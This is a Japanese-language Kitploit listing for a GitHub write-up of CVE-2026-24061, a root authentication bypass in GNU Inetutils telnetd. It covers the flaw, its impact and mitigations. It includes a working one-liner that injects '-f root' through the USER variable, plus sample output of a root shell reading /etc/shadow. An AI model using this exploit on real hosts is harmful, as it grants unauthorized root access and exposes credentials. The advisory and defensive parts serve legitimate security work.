Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — CVE-2026-24061 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2026-24061
特権昇格脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHub0xblackash/cve-2026-24061

CVE-2026-24061

CVE-2026-24061

リポジトリを見る
1463ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2026-24061 —「TelneTD」

ChatGPT Image Jun 25, 2026, 03_03_25 PM

GNU Inetutils telnetdにおける重大なリモート認証バイパス
2015年の亡霊が、まだtelnetを動かしている全てを乗っ取るために舞い戻った。

CVSS Badge Status Badge KEV Badge Type Badge

認証不要。環境変数一つ。即座にルートシェル。


⚠️ 概要

CVE-2026-24061は、GNU Inetutils telnetd ≤ 2.7における重大なリモート特権昇格脆弱性です。

認証されていないリモート攻撃者が、Telnet NEW-ENVIRONオプションを介してUSER環境変数を"-f root"に設定します。
telnetdはそれをサニタイズせずそのまま/bin/loginに渡します。→ loginは-f rootを見て→すべての認証をスキップ→攻撃者をルートシェルに落とします。

この危険なコードは、約11年間(2015年頃から)静かにツリー内に潜んでいました。

「環境変数一つ。パスワード不要。完全なルート。2026年へようこそ。」


🔥 深刻度と影響

  • CVSS v3.1基本スコア: 9.8 / 重大
    AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
  • 攻撃ベクトル: ネットワーク (TCP/23)
  • 必要な権限: なし
  • ユーザーの操作: なし
  • エクスプロイトの成熟度: 自明 (任意のtelnetクライアントから一行で動作)

2026年3月の現実:

  • 1月下旬から大規模なスキャンと悪用が確認されています
  • レガシー組み込み機器、OT機器、忘れられたテストサーバーがまだ広く露出
  • 完全なシステム侵害:認証情報、永続化、ランサムウェアの入口

🕵️ 発見

  • 2026年1月中旬にGNUメンテナに非公開で報告
  • 2026年1月下旬にoss-security経由で公開
  • GNU Inetutils ≥ 2.8で修正(公開後すぐにリリース)

🔬 技術的な詳細

telnetdが次の内容を含むNEW-ENVIRONオプションを受け取ると:

USER=-f root

その値を直接/bin/loginに渡されるargvに追加します:

execve("/bin/login", ["login", "-f", "root", ...], ...)

loginバイナリは-f rootを次のように解釈します:
「このユーザーは既にrootとして認証済み — パスワードチェック不要」

→ 攻撃者は**#**プロンプトを取得。ゲームオーバー。

致命的な設計上の選択: -R / 環境変数の転送が認可されたユーザーに制限されていなかった。


📅 タイムライン

日付イベント
〜2015年3月脆弱な環境変数処理が導入された
2026年1月上流に非公開で報告
2026年1月下旬公開開示 & CVE割り当て
2026年1月下旬修正リリース (Inetutils ≥ 2.8)
2026年1月26日CISA既知の悪用される脆弱性カタログに追加
2026年2月〜3月レガシー/OTシステムに対する悪用が急増
2026年3月多くの組み込みベンダーがまだ沈黙または未パッチ

🖥️ 影響を受けるシステム

脆弱なバージョン: GNU Inetutils telnetd 1.9.3 – 2.7
2026年の一般的なターゲット:

  • レガシー産業用コントローラ及びHMI
  • 古いルーター、スイッチ、プリンター
  • Debianベースの組み込みアプライアンス
  • 忘れられた開発/テストVMとコンテナ
  • まだTCP/23を公開しているOTゲートウェイ

安全:

  • busybox telnetdを実行しているシステム
  • Inetutils ≥ 2.8
  • Telnetが完全に無効化/ファイアウォールで遮断されている

💥 エクスプロイトの動作

ワンライナー (telnetクライアントがある任意のLinux/macOS):

USER="-f root" telnet -a 192.168.1.50

典型的な出力:

telned
┌──(attacker㉿kali)-[~]
└─$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.

Debian GNU/Linux 12 telnetd

root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...

Enterキーを一回押すだけで — 完全なルートアクセス。


🛡️ 確認と対策 (2026年3月)

1. 脆弱なサービスの検出

telnet localhost 23   # look for inetutils banner
inetutils-telnetd --version   # vulnerable if ≤ 2.7

2. 停止する(恒久的に推奨)

systemctl disable --now inetutils-inetd   # or telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd

3. 更新(どうしてもtelnetを残す必要がある場合 — 稀)

sudo apt update && sudo apt install --reinstall inetutils-telnetd   # → ≥2.8

4. ファイアウォール(二重の防御)

iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp

📈 状況 — 2026年3月

  • 未パッチのレガシーデバイスに対する悪用が継続
  • Telnetの使用率は過去最低 — しかし存在する場合は依然として致命的
  • エコシステムの教訓: レガシープロトコルは地雷

🎓 石に刻まれた教訓

  • 11年前のバグがまだ「死んだ」コードに潜んでいる
  • サニタイズされていないユーザー入力をrootを生成するバイナリに渡してはいけない
  • 引数インジェクション → rootは時代を超える
  • Telnetは2010年に死ぬべきだった。2026年に殺せ。
ツールをダウンロード